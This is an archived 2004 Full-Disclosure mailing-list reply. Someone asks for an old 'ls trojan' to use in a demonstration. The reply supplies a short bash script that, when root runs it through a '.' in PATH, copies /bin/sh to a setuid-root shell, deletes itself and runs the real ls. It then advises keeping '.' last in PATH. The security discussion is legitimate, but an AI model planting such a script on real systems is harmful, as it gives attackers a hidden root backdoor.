|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: [Full-Disclosure] Old LS Trojan?
From: Andrew Farmer (andfarm
teknovis.com)
Date: Wed Dec 01 2004 - 16:27:40 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
On 01 Dec 2004, at 12:11, David S. Morgan wrote:
> I am looking for an old LS trojan, with trojan being a misnomer.
> Essentially, the scinario is that the admin (root) has a . (dot) in
> his path. The bad-user knows this, and has crafted an LS shell script
> (the part that I can't find) that essentially copies /sbin/sh to a
> hidden directory and then performs some suid majik to make the sh run
> as if they were root, without needing the root password. The file
> then removes itself and does the real version of ls.
>
> Does anyone remember this one, and have the ls script anywhere? I
> would like to use it in a demonstration. I know that this has
> probobly been fixed in various ways, but I have "old Unixes" for just
> such occasions.
Probably something along the lines of:
> #!/bin/bash
> [ `whoami` = root ] || exit
> cp /bin/sh /bin/suid-sh
> chmod +s /bin/suid-sh
> rm $0
> exec /bin/ls $*
Note that this would only run if your $PATH _begins_ with '.' - if
you're going to put '.' in your $PATH, put it _last_.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (Darwin)
iD8DBQFBrkVcPa6RRaKl0ScRArwAAKDzpCkbPQ/MW8FiSmEGzvZgoOInsACdFsG5
jJ+uOuWV9VPxOK7Gu5LqCNI=
=ibGx
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]